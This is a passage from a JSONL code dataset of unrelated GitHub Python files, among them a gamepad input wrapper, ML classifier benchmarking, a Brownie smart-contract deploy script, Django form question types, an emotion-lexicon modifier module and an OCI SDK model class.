time.sleep(0.05)\n","repo_name":"guisoares9/iiwa_practices","sub_path":"src/iiwa_simulation_node.py","file_name":"iiwa_simulation_node.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22817947894","text":"# Enumeration Based Microsoft XInput - Gamepad API\n\nfrom ._ctypes import *\n\nfrom typing import *\nfrom enum import Enum\nfrom time import time as time_now\n\n__all__ = ['XInputGamepad', 'GamePadState', 'AnalogStick', 'ButtonFlags', 'AnalogInputs']\n\nEventKeys = Union[AnalogInputs, ButtonFlags]\n\n\n# Immutable data classes\n# State of an analog stick\nclass AnalogStick(NamedTuple):\n    x: float\n    y: float\n    raw_x: int\n    raw_y: int\n    dead_zone: float\n    magnitude: float\n\n\n# Input state of XGamePad\nclass GamePadState(NamedTuple):\n    analog_l: AnalogStick\n    analog_r: AnalogStick\n    trigger_l: float\n    trigger_r: float\n    buttons: Dict[ButtonFlags, bool]\n    events: Dict[EventKeys, Any]\n\n\n# Updates all xinput devices and checks connections\ndef update_gamepads():\n    for g in XInputGamepad:\n        if not g.enabled:\n            pass\n        elif g.connected() or time_now() - g.last_update > 5:\n            # update connected devices or try to reconnect after 5 secs\n            g.fetch_input()\n\n\n# Instantiation helper for a neutral gamepad state\ndef create_neutral_state(dz) -> GamePadState:\n    neutral_as = 
create_analog_stick(0, 0, dz)\n    return GamePadState(analog_l=neutral_as, analog_r=neutral_as,\n                        trigger_l=.0, trigger_r=.0, events={},\n                        buttons={b: False for b in ButtonFlags})\n\n\n# Instantiation helper for analog sticks\ndef create_analog_stick(raw_x: int, raw_y: int, dead_zone: float) -> AnalogStick:\n    axis_x = raw_x / C_SHORT\n    axis_y = raw_y / C_SHORT\n    magnitude = (axis_x ** 2 + axis_y ** 2) ** 0.5\n    if magnitude > dead_zone:\n        dz_factor = (magnitude - dead_zone) / (1 - dead_zone)\n        return AnalogStick(x=axis_x / magnitude * dz_factor,\n                           y=axis_y / magnitude * dz_factor,\n                           raw_x=raw_x,\n                           raw_y=raw_y,\n                           dead_zone=dead_zone,\n                           magnitude=magnitude)\n    else:\n        return AnalogStick(x=.0,\n                           y=.0,\n                           raw_x=raw_x,\n                           raw_y=raw_y,\n                           dead_zone=dead_zone,\n                           magnitude=.0)\n\n\n# Singleton-like gamepad class\n# Enumeration approach to the Singleton Pattern\nclass XInputGamepad(Enum):\n    pad_0 = 0\n    pad_1 = 1\n    pad_2 = 2\n    pad_3 = 3\n\n    def __init__(self, value):\n        # hardware info\n        self._raw_id = value\n        self._raw_state = XINPUTSTATE()\n\n        # status\n        self.enabled = True\n        self._connected = False\n        self.last_update = time_now()\n\n        # settings\n        self.dz = 0.3\n\n        # state\n        self.input_state = create_neutral_state(self.dz)\n        self.rumble_l = 0\n        self.rumble_r = 0\n\n    def connected(self) -> bool:\n        return self._connected\n\n    def __repr__(self) -> str:\n        return \"XGamePad: {}\".format(self._raw_id)\n\n    def __str__(self) -> str:\n        tmp = \"connected\" if self._connected else \"not connected\"\n        return \"XGamePad:{} ({})\".format(self._raw_id, tmp)\n\n    def set_rumble(self, rumble_l: float, rumble_r: float) -> None:\n        self.rumble_l = rumble_l\n        self.rumble_r = rumble_r\n        vibration = XINPUTVIBRATION(int(rumble_l * U_SHORT), int(rumble_r * U_SHORT))\n        XInputSetState(self._raw_id, ctypes.byref(vibration))\n\n    def fetch_input(self) -> None:\n        self.last_update = time_now()\n        success = self._try_fetch_raw()\n        if success:\n            # analog input\n            events = dict()\n            game_pad = self._raw_state.Gamepad\n            # analog_l\n            analog_l = self._read_analog(AnalogInputs.analog_l,\n                                         self.input_state.analog_l,\n                                         game_pad.sThumbLX,\n                                         game_pad.sThumbLY,\n                                         events)\n            # analog_r\n            analog_r = self._read_analog(AnalogInputs.analog_r,\n                                         self.input_state.analog_r,\n                                         game_pad.sThumbRX,\n                                         game_pad.sThumbRY,\n                                         events)\n            # trigger_l\n            trigger_l = self._read_trigger(AnalogInputs.trigger_l,\n                                           self.input_state.trigger_l,\n                                           game_pad.bLeftTrigger,\n                                           events)\n            # trigger_r\n            trigger_r = self._read_trigger(AnalogInputs.trigger_r,\n                                           self.input_state.trigger_r,\n                                           game_pad.bRightTrigger,\n                                           events)\n            # digital input\n            buttons = dict()\n            for btn_code in ButtonFlags:\n                self._read_button(btn_code, events, buttons)\n\n            # create new official state\n            self.input_state = GamePadState(analog_l=analog_l,\n                                            analog_r=analog_r,\n                                            trigger_l=trigger_l,\n                                            trigger_r=trigger_r,\n                                            buttons=buttons,\n                                            events=events)\n\n    def _try_fetch_raw(self) -> bool:\n        error_code = XInputGetState(self._raw_id, self._raw_state)\n        if error_code == ERROR_NOT_CONNECTED:\n            if self._connected:\n                # connection lost\n                # update connection status\n                self._connected = False\n                # reset input fields\n                self.input_state = create_neutral_state(self.dz)\n                # disconnected!\n                print(self)\n            return False\n        else:\n            if not self._connected:\n                # connection established\n                # update connection status\n                self._connected = True\n                # deactivate vibration\n                self.set_rumble(rumble_l=.0, rumble_r=.0)\n                # reconnected!\n                print(self)\n            return True\n\n    def _read_analog(self, key, old_value, raw_x, raw_y, events):\n        new_value = create_analog_stick(raw_x, raw_y, self.dz)\n        dx = new_value.x - old_value.x\n        dy = new_value.y - old_value.y\n        if abs(dx) > 0 or abs(dy) > 0:\n            
events[key] = (dx, dy)\n        return new_value\n\n    # noinspection PyMethodMayBeStatic\n    def _read_trigger(self, key, old_value, raw_value, events):\n        new_value = raw_value / U_BYTE\n        delta = new_value - old_value\n        if abs(delta) > 0:\n            events[key] = delta\n        return new_value\n\n    def _read_button(self, btn_code, events, buttons):\n        new_value = (self._raw_state.Gamepad.wButtons & btn_code.value) != 0\n        old_value = self.input_state.buttons[btn_code]\n        if new_value != old_value:\n            events[btn_code] = new_value\n        buttons[btn_code] = new_value\n        return new_value\n","repo_name":"Korangar/PyPlatformer2018_ProjectRain","sub_path":"api/xinput/xinput_game_pad.py","file_name":"xinput_game_pad.py","file_ext":"py","file_size_in_byte":6900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72608332964","text":"import image_augmentation\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV, train_test_split\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom xgboost import XGBClassifier\nimport random\nimport skimage as sk\nimport skimage.io as skio\nimport os\nimport numpy as np\nimport time\n\ndef main():\n    data = []\n    \n    nmc = 'C:\\\\Users\\\\gabri\\\\Desktop\\\\NMC Pathology\\\\nmc'\n    non_nmc = 'C:\\\\Users\\\\gabri\\\\Desktop\\\\NMC Pathology\\\\non-nmc'\n\n    nmc_images = [os.path.join(nmc, f) for f in os.listdir(nmc) if os.path.isfile(os.path.join(nmc, f))]\n    non_nmc_images = [os.path.join(non_nmc, f) for f in os.listdir(non_nmc) if os.path.isfile(os.path.join(non_nmc, f))]\n    \n    nmc_labels = [1 for _ in range(len(nmc_images))]\n    non_nmc_labels = [0 for _ in range(len(non_nmc_images))]\n    \n    targets = nmc_labels + non_nmc_labels\n    \n    nmc_imgs = []\n    non_nmc_imgs = []\n    \n    for pic in nmc_images:\n        img = skio.imread(pic)\n        img = sk.transform.resize(img, (150, 150), anti_aliasing=True)\n        #img = sk.color.rgb2gray(img)\n        nmc_imgs.append(img.flatten())\n    \n    for pic in non_nmc_images:\n        img = skio.imread(pic)\n        img = sk.transform.resize(img, (150, 150), anti_aliasing=True)\n        #img = sk.color.rgb2gray(img)\n        non_nmc_imgs.append(img.flatten())\n    \n    data = nmc_imgs + non_nmc_imgs\n    data = np.asarray(data)\n    targets = np.asarray(targets)\n    \n    x_train, x_test, y_train, y_test = train_test_split(data, targets, test_size=0.3, random_state=0)\n    \n    svc = svm.SVC(random_state=0)\n    xgb = XGBClassifier(random_state=0)\n    dtc = DecisionTreeClassifier(random_state=0)\n    nbc = GaussianNB()\n    rfc = RandomForestClassifier(random_state=0)\n    gbc = GradientBoostingClassifier(random_state=0)\n    mlp = MLPClassifier(random_state=0)\n    \n    models = {\"SVC\": svc, \"XGBoost\": xgb, \"DecisionTree\": dtc, \"NaiveBayes\": nbc, \"RandomForest\": rfc, \"GradientBoost\": gbc, \"NeuralNet\": mlp}\n    params = {}\n    \n    for name, model in models.items():\n        if model == svc:\n            params = {'C': [1, 10, 100, 1000], 'gamma': [0.01, 0.001, 0.0001], 'kernel': ['rbf', 'linear']}\n        elif model == xgb:\n            params = {}\n        elif model == dtc:\n            params = {'max_depth': [1, 2, 3, 4]}\n        elif model == nbc:\n            params = {}\n        elif model == mlp:\n            params = {'hidden_layer_sizes': [[128, 64, 32], [32, 32, 32]], 'activation': ['tanh', 'relu'], 'solver': ['sgd', 'adam'], 'alpha': [0.0001, 0.001, 
0.01, 0.1], 'max_iter': [200, 300, 400]}\n        elif model == rfc:\n            params = {'n_estimators': [5, 10, 16, 32, 64, 128]}\n        elif model == gbc:\n            params = {'n_estimators': [5, 10, 16, 32, 64, 128]}\n        \n        start_time = time.time()\n        \n        clf = GridSearchCV(model, params, cv=5)\n        clf.fit(x_train, y_train)\n        pred = clf.predict(x_test)\n        confusion = confusion_matrix(y_test, pred)\n        \n        duration = time.time() - start_time\n        \n        print(\"\\n\\n--- {} ---\".format(name))\n        print(\"Total Duration: {}\".format(duration))\n        print(\"Score: {}\".format(clf.score(x_test, y_test)))\n        print(\"Confusion Matrix:\")\n        print(\"{}\".format(confusion))\n    \nif __name__ == '__main__':\n    main()\n","repo_name":"Gabriel0110/NUT-Carcinoma-Pathology-Classification","sub_path":"NMC_Classifier.py","file_name":"NMC_Classifier.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38974736095","text":"import os\nfrom django.contrib.gis.utils import LayerMapping\nfrom .models import Roads\n\nroads_mapping = {\n\t'osm_id' : 'osm_id',\n\t'name' : 'name',\n\t'ref' : 'ref',\n\t'type' : 'type',\n\t'oneway' : 'oneway',\n\t'bridge' : 'bridge',\n\t'maxspeed' : 'maxspeed',\n\t'geom' : 'MULTILINESTRING',\n}\n\n\n\n\nroads_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), '../mapgis/data/Roads.shp'))\n\ndef run(verbose=True):\n    lm = LayerMapping(Roads, roads_shp, roads_mapping, transform=False, encoding='iso-8859-1')\n\n    lm.save(strict=True, verbose=verbose)","repo_name":"Thom03/nairobicameras","sub_path":"mapgis/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21672306308","text":"import math\n\ndef floatInput(prompt, min = None, max = None):\n    if min is not None and max is not None:\n        assert min < max\n    while True:\n        try:\n            res = float(input(prompt))\n        except ValueError:\n            print(\"ERROR: Not a float\")\n            continue\n        lo = min if min is not None else float(\"-inf\")\n        hi = max if max is not None else float(\"inf\")\n        if lo <= res <= hi:\n            return res\n        print(\"ERROR: Value should be in [%s, %s]!\" % (lo, hi))\n\n\ndef main():\n    print(\"a) Try entering invalid values such as 1/2 or 3,1416.\")\n    v = floatInput(\"Value? \")\n    print(\"v:\", v)\n\n    print(\"b) Try entering invalid values such as 15%, 110 or -1.\")\n    h = floatInput(\"Humidity (%)? \", 0, 100)\n    print(\"h:\", h)\n\n    print(\"c) Try entering invalid values such as 23C or -274.\")\n    t = floatInput(\"Temperature (Celsius)? \", min=-273.15)\n    print(\"t:\", t)\n\n    # d) What happens if you uncomment this?\n    # impossible = floatInput(\"Value in [3, 0]? \", min=3, max=0)\n\n    return\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"P-Ramos16/Univ","sub_path":"2021-2022/Sem1/FP/Aula06/floatinput.py","file_name":"floatinput.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36606172355","text":"import yt_dlp\r\n\r\n'''\r\nRu: Вводим через терминал ссылку на видео\r\nEng: Enter the video link through the terminal\r\n'''\r\nurl = input('Enter the link for the video: ') \r\n\r\ndef download(url):\r\n    '''\r\n    Ru: Опции для скачивания. По умолчанию стоит формат скачки 'mp4', его можно поменять, но советую оставить этот формат\r\n    Eng: Options for downloading. 
The default download format is 'mp4', you can change it, but I advise you to keep this format\r\n '''\r\n ydl_opts = {\r\n 'format': 'mp4'\r\n }\r\n\r\n '''\r\n Ru: Открываем контектстный менеджер и начинаем скачивание нашего видео\r\n Eng: Open the content manager and start downloading our video.\r\n '''\r\n with yt_dlp.YoutubeDL(ydl_opts) as ydl:\r\n ydl.download([url])\r\n\r\n'''\r\nRu: Вызов функции скачивания видео\r\nEng: Calling the video download function\r\n'''\r\ndownload(url)","repo_name":"VolinNilov/Useful-tools-from-Volin","sub_path":"YouTube Downloader/youtube_download.py","file_name":"youtube_download.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70059861604","text":"'''\r\nWrite a program that computes the net amount of a bank account based a transaction\r\n log from console input. The transaction log format is shown as following:\r\nD 100\r\nW 200\r\n\r\nD means deposit while W means withdrawal.\r\nSuppose the following input is supplied to the program:\r\nD 300\r\nD 300\r\nW 200\r\nD 100\r\nThen, the output should be:\r\n500\r\n'''\r\ntotal = 0\r\nwhile True:\r\n s = input()\r\n if not s:\r\n break\r\n values = s.split(\" \")\r\n operation = values[0]\r\n count = int(values[1])\r\n if operation == \"D\":\r\n total += count\r\n elif operation == \"W\":\r\n total -= count\r\nprint(\"total is %d\" %total)","repo_name":"Z-P-J/PythonProgrammingEveryday","sub_path":"src/day25/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39082220515","text":"from django import forms\nfrom django.utils.translation import gettext_lazy as _\n\nfrom .base import QuestionTypeBase\n\n\nclass ChoicesBase(QuestionTypeBase):\n class Meta:\n abstract = True\n\n class OptionsForm(forms.Form):\n empty_label = forms.CharField(required=False)\n # choices = EditChoicesField()\n\n def clean_question_options(self, question_options):\n \"\"\"\n expected question_options format:\n {\n choices: [\n {value: \"\", label: \"\"}, ...\n ]\n }\n \"\"\"\n if \"choices\" not in question_options:\n raise forms.ValidationError('key \"choices\" required')\n if not isinstance(question_options.get(\"choices\"), list):\n raise forms.ValidationError('list in \"choices\" required')\n if len(question_options.get(\"choices\")) < 1:\n raise forms.ValidationError('list of \"choices\" is empty')\n for choice in question_options.get(\"choices\"):\n if \"label\" not in choice:\n raise forms.ValidationError('key \"label\" in choice is required')\n if \"value\" not in choice:\n raise forms.ValidationError('key \"value\" in choice is required')\n\n # Clean whitespace and set 'value' to 'label' if it is empty.\n value = choice[\"value\"].strip()\n label = choice[\"label\"].strip()\n choice[\"value\"] = value if value else label\n choice[\"label\"] = label\n\n return question_options\n\n\nclass Choices(ChoicesBase):\n class Meta:\n name = \"choices\"\n verbose_name = _(\"Choices\")\n widget_class = forms.Select\n\n def formfield(self, result_set):\n choices = [(c.get(\"value\"), c.get(\"label\")) for c in self.question.question_options.get(\"choices\")]\n\n if self.question.question_options.get(\"empty_label\"):\n choices = [(\"\", self.question.question_options.get(\"empty_label\"))] + choices\n\n return forms.ChoiceField(\n widget=self.formfield_widget(),\n label=self.question.question_text,\n 
required=self.question.required,\n choices=choices,\n # validators=[validators.validate_slug],\n )\n\n\nclass ChoicesMultiple(ChoicesBase):\n class Meta:\n name = \"choices_multiple\"\n verbose_name = _(\"Choices multiple\")\n multiple = True\n widget_class = forms.CheckboxSelectMultiple\n\n def formfield(self, result_set):\n choices = [(c.get(\"value\"), c.get(\"label\")) for c in self.question.question_options.get(\"choices\")]\n\n if self.question.question_options.get(\"empty_label\"):\n choices = [(\"\", self.question.question_options.get(\"empty_label\"))] + choices\n\n return forms.MultipleChoiceField(\n widget=self.formfield_widget(),\n label=self.question.question_text,\n required=self.question.required,\n choices=choices,\n # validators=[validators.validate_slug],\n )\n","repo_name":"anfema/django-questionnaire-core","sub_path":"questionnaire_core/question_types/choices.py","file_name":"choices.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70507165605","text":"import numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\n\n\nnegations = ['never','not', 'no', 'didn', \"didn't\", 'didnt', 'didn t','doesn t', 'doesnt', \"doesn't\", \"won't\", 'won t', 'wont', \"isn't\",\"isnt\",\"isn t\", \"aren't\", 'aren t', 'arent', 'don t', \"don't\", 'dont',\"haven't\",\"haven t\",\"havent\",'weren t', \"weren't\", 'werent', \"wasn't\", 'wasn t', 'wasnt', 'wouldn t', \"wouldn't\", 'wouldnt', \"can't\", 'can t', 'couldn t',\"couldn't\", 'cant', 'cannot', 'couldnt', 'shouldnt', \"shouldn't\", 'shouldn t', 'neither', 'impossible', 'didn', 'wasn', 'weren', 'aren', 'don', 'doesn', 'couldn', 'shouldn', 'wouldn', 'won','nothing']\n\nintensity_modifiers= ['absolutely:B_INCR:0.9', 'almost:B_DECR:0.2', 'always:B_INCR:0.9', 'amazingly:B_INCR:0.8', 'awfully:B_INCR:0.8',\n 'completely:B_INCR:0.9', 'considerable:B_INCR:0.6', 'considerably:B_INCR:0.6', 'decidedly:B_INCR:0.6', 'deeply:B_INCR:0.9',\n 'effing:B_INCR:0.7', 'enormous:B_INCR:0.8', 'enormously:B_INCR:0.8', 'entirely:B_INCR:0.9', 'especially:B_INCR:0.8', 'exceptional:B_INCR:0.8',\n 'exceptionally:B_INCR:0.8', 'extreme:B_INCR:0.9', 'extremely:B_INCR:0.9', 'fabulously:B_INCR:0.8', 'flippin:B_INCR:0.6', 'flipping:B_INCR:0.6',\n 'frackin:B_INCR:0.6', 'fracking:B_INCR:0.6', 'frickin:B_INCR:0.7', 'fricking:B_INCR:0.7', 'friggin:B_INCR:0.7', 'frigging:B_INCR:0.7', 'fully:B_INCR:0.9',\n 'greatly:B_INCR:0.8', 'hella:B_INCR:0.8','bloody:B_INCR:0.8', 'highly:B_INCR:0.9', 'hugely:B_INCR:0.9', 'incredible:B_INCR:0.9', 'incredibly:B_INCR:0.9', 'intensely:B_INCR:0.9',\n 'just enough:B_DECR:0.4', 'kind of:B_DECR:0.3', 'kinda:B_DECR:0.3', 'kindof:B_DECR:0.3', 'kind-of:B_DECR:0.3', 'less:B_DECR:0.3', 'little:B_DECR:0.3', 'major:B_INCR:0.6',\n 'majorly:B_INCR:0.6', 'marginal:B_DECR:0.3', 'marginally:B_DECR:0.3', 'more:B_INCR:0.6', 'most:B_INCR:0.8', 'not much:B_DECR:0.2', 'occasional:B_DECR:0.6',\n 'occasionally:B_DECR:0.6', 'particularly:B_INCR:0.7', 'partly:B_DECR:0.3','partially:B_DECR:0.5', 'purely:B_INCR:0.9', 'quite:B_INCR:0.6', 'really:B_INCR:0.8', 'remarkably:B_INCR:0.9',\n 'slight:B_DECR:0.3', 'slightly:B_DECR:0.6','barely:B_DECR:0.7', 'so:B_INCR:0.8', 'somewhat:B_DECR:0.4', 'soo:B_INCR:0.9', 'sort of:B_DECR:0.4', 'sorta:B_DECR:0.4', 'sortof:B_DECR:0.4',\n 'sort-of:B_DECR:0.4', 'substantially:B_INCR:0.7', 'super:B_INCR:0.8', 'thoroughly:B_INCR:0.8', 'total:B_INCR:0.8', 'totally:B_INCR:0.9', 'tremendous:B_INCR:0.8',\n 
'tremendously:B_INCR:0.8', 'truly:B_INCR:0.9', 'unbelievably:B_INCR:0.9', 'unusually:B_INCR:0.7', 'utter:B_INCR:0.8', 'utterly:B_INCR:0.8', 'very:B_INCR:0.8',\n                      'not very:B_DECR:0.7']\n\n\ndef map_candidate_to_theme(neighbour_dict, candidate_dict):\n    # print(neighbour_dict)\n    # print(len(neighbour_dict['words']))\n    # print(candidate_dict)\n    emo_candi_dict = {}\n    neighbor_df = pd.DataFrame(neighbour_dict)\n    # print(neighbor_df.head())\n\n    dft = neighbor_df.groupby('labels')['words'].nunique().sort_values(ascending=False).reset_index(name='count')\n    unique_emos = dft['labels'][:3]\n    # print(unique_emos)\n\n    for each_cd in candidate_dict:\n        dis_emo_dict = {}\n        for each_ue in unique_emos:\n            dis_list = []\n            emod = neighbor_df.loc[neighbor_df['labels'] == each_ue][:50]\n            for j, e_row in emod.iterrows():\n                dis_list.append(cosine_similarity([e_row['embs']], [each_cd[2]]))\n            # print(np.mean(dis_list))\n            dis_emo_dict[each_ue] = np.mean(dis_list)\n        # print(each_cd[0])\n        # print(dis_emo_dict)\n        # print(max(dis_emo_dict, key=dis_emo_dict.get))\n        emo_candi_dict[each_cd[0]] = max(dis_emo_dict, key=dis_emo_dict.get)\n        # break\n    return emo_candi_dict\n\ndef fix_score(current_score,in_dc,in_sc):\n    if(in_dc=='B_INCR'):\n        final_score = current_score+(current_score*in_sc)\n    elif(in_dc=='B_DECR'):\n        final_score = current_score-(current_score*in_sc)\n    return final_score\n\ndef check_for_negations(top_candidates):\n    neg = False\n    for tsp in top_candidates:\n        for each_p in tsp.split(' '):\n            if(each_p in negations):\n                # print('profiles are negated')\n                neg = True\n    return neg\n\n\ndef map_opposite_emotions(emo_dict):\n    opposite_emotions = {\n        'Religion/creed': 'Religion/creed',\n        'Race/ethnicity': 'Race/ethnicity',\n        'Gender': 'Gender',\n        'Sexual Orientation': 'Sexual Orientation',\n        'Physical/disability': 'Physical/disability',\n    }\n    opposed_dict = {}\n\n    for each_key in emo_dict.keys():\n        opposite_emo = opposite_emotions[each_key]\n        if(opposite_emo in opposed_dict):\n            opposed_dict[opposite_emo] = opposed_dict[opposite_emo]+emo_dict[each_key]\n        else:\n            opposed_dict[opposite_emo] = emo_dict[each_key]\n\n    print(opposed_dict)\n\n    return opposed_dict\n\ndef resolve_modifiers_and_negations(top_windows,sentence_tokens,emo_candidates,normalized_score_dict ):\n    fixed_top_windows = []\n    for i, emoWord in enumerate(top_windows):\n\n        end_ind_int = sentence_tokens.index(emoWord)\n        start_ind_int = end_ind_int - 3\n        if start_ind_int < 0:\n            start_ind_int = 0\n        text_chunk_int = (' ').join(sentence_tokens[start_ind_int:end_ind_int])\n        text_chunk_int = text_chunk_int.strip().lower()\n        fixed_top_windows.append(text_chunk_int)\n\n        # check_negations and intensity modifiers only in top candidate\n        if (i == 0):\n\n            # check for intensifiers or inhibitors\n            for im in intensity_modifiers:\n                im_splits = im.split(':')\n                int_w = im_splits[0]\n                in_dc = im_splits[1]\n                in_sc = float(im_splits[2])\n                if (len(int_w.split()) == 1):\n                    if int_w in text_chunk_int.split():\n                        # print('gotcha', im)\n                        # print('emo', emo_candidates[emoWord])\n                        crnt_sc = normalized_score_dict[emo_candidates[emoWord]]\n                        normalized_score_dict[emo_candidates[emoWord]] = fix_score(crnt_sc, in_dc, in_sc)\n                        # print('fixed', 
normalized_score_dict)\n\n            # check negations\n            print('check negation')\n            if (check_for_negations([text_chunk_int])):\n                print('Emotions are negated')\n                normalized_score_dict = map_opposite_emotions(normalized_score_dict)\n    return [normalized_score_dict,fixed_top_windows]\n\n# map_opposite_emotions({'anger': 0.353, 'disgust': 0.688,'anticipation':0.009})","repo_name":"GihanMora/Extreme_LexiBERTa","sub_path":"Core/modifier_handling.py","file_name":"modifier_handling.py","file_ext":"py","file_size_in_byte":7053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"14557051873","text":"from brownie import FundMe\nfrom brownie import MockV3Aggregator # List of MockV3Aggregators\nfrom brownie import network # Brownie has a list of networks. Check 'brownie networks list'\nfrom brownie import accounts # This is list of 10 Ganache accounts spawned by brownie\nfrom brownie import config # This connects to our brownie-config.yaml file\nfrom web3 import Web3\n\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork\", \"mainnet-fork-dev\"]\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-l\"]\n\ndef deploy_fund_me():\n    account = get_account()\n\n    if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n        price_feed_address = config[\"networks\"][network.show_active()][\n            \"eth_usd_price_feed\"\n        ]\n        print(\"Current network: \", network.show_active())\n    else:\n        print(f\"Current network: {network.show_active()}\")\n        if len(MockV3Aggregator) <= 0:\n            print(\"Deploying Mock...\")\n            MockV3Aggregator.deploy(18, Web3.toWei(2000, \"ether\"), {\"from\":account})\n            print(\"Mock deployed...\")\n\n        price_feed_address = MockV3Aggregator[-1].address\n\n    fund_me = FundMe.deploy(\n        price_feed_address,\n        {\"from\": account}, \n        publish_source=config[\"networks\"][network.show_active()].get(\"verify\")\n    )\n    print(f'FundMe deployed at address: {fund_me.address}')\n    return fund_me\n\ndef main():\n    deploy_fund_me()\n\n# Check if --network is included in brownie run deploy.py\ndef get_account():\n    if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS or network.show_active() in FORKED_LOCAL_ENVIRONMENTS:\n        return accounts[0]\n    else:\n        return accounts.add(config[\"wallets\"][\"from_key\"])\n    ","repo_name":"anonm9k/solidity-smart-contract-dev","sub_path":"demos/brownie_fund_me/scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31584168139","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ExportFormat(object):\n    \"\"\"\n    Specifies the export format to be used for exporting snapshot.\n    \"\"\"\n\n    #: A constant which can be used with the name property of a ExportFormat.\n    #: This constant has a value of \"JSONL\"\n    NAME_JSONL = \"JSONL\"\n\n    #: A constant which can be used with the name property of a ExportFormat.\n    #: This constant has a value of \"JSONL_CONSOLIDATED\"\n    NAME_JSONL_CONSOLIDATED = \"JSONL_CONSOLIDATED\"\n\n    #: A constant which can be used with the name property of a ExportFormat.\n    #: This constant has a value of \"CONLL\"\n    NAME_CONLL = \"CONLL\"\n\n    #: A constant which can be used with the name property of a ExportFormat.\n    #: This constant has a value of \"SPACY\"\n    NAME_SPACY = \"SPACY\"\n\n    #: A constant which can be used with the name 
property of a ExportFormat.\n #: This constant has a value of \"COCO\"\n NAME_COCO = \"COCO\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"YOLO\"\n NAME_YOLO = \"YOLO\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"PASCAL_VOC\"\n NAME_PASCAL_VOC = \"PASCAL_VOC\"\n\n #: A constant which can be used with the name property of a ExportFormat.\n #: This constant has a value of \"JSONL_COMPACT_PLUS_CONTENT\"\n NAME_JSONL_COMPACT_PLUS_CONTENT = \"JSONL_COMPACT_PLUS_CONTENT\"\n\n #: A constant which can be used with the version property of a ExportFormat.\n #: This constant has a value of \"V2003\"\n VERSION_V2003 = \"V2003\"\n\n #: A constant which can be used with the version property of a ExportFormat.\n #: This constant has a value of \"V5\"\n VERSION_V5 = \"V5\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ExportFormat object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param name:\n The value to assign to the name property of this ExportFormat.\n Allowed values for this property are: \"JSONL\", \"JSONL_CONSOLIDATED\", \"CONLL\", \"SPACY\", \"COCO\", \"YOLO\", \"PASCAL_VOC\", \"JSONL_COMPACT_PLUS_CONTENT\"\n :type name: str\n\n :param version:\n The value to assign to the version property of this ExportFormat.\n Allowed values for this property are: \"V2003\", \"V5\"\n :type version: str\n\n \"\"\"\n self.swagger_types = {\n 'name': 'str',\n 'version': 'str'\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'version': 'version'\n }\n\n self._name = None\n self._version = None\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this ExportFormat.\n Name of export format.\n\n Allowed values for this property are: \"JSONL\", \"JSONL_CONSOLIDATED\", \"CONLL\", \"SPACY\", \"COCO\", \"YOLO\", \"PASCAL_VOC\", \"JSONL_COMPACT_PLUS_CONTENT\"\n\n\n :return: The name of this ExportFormat.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this ExportFormat.\n Name of export format.\n\n\n :param name: The name of this ExportFormat.\n :type: str\n \"\"\"\n allowed_values = [\"JSONL\", \"JSONL_CONSOLIDATED\", \"CONLL\", \"SPACY\", \"COCO\", \"YOLO\", \"PASCAL_VOC\", \"JSONL_COMPACT_PLUS_CONTENT\"]\n if not value_allowed_none_or_none_sentinel(name, allowed_values):\n raise ValueError(\n f\"Invalid value for `name`, must be None or one of {allowed_values}\"\n )\n self._name = name\n\n @property\n def version(self):\n \"\"\"\n Gets the version of this ExportFormat.\n Version of export format.\n\n Allowed values for this property are: \"V2003\", \"V5\"\n\n\n :return: The version of this ExportFormat.\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"\n Sets the version of this ExportFormat.\n Version of export format.\n\n\n :param version: The version of this ExportFormat.\n :type: str\n \"\"\"\n allowed_values = [\"V2003\", \"V5\"]\n if not value_allowed_none_or_none_sentinel(version, allowed_values):\n raise ValueError(\n f\"Invalid value for 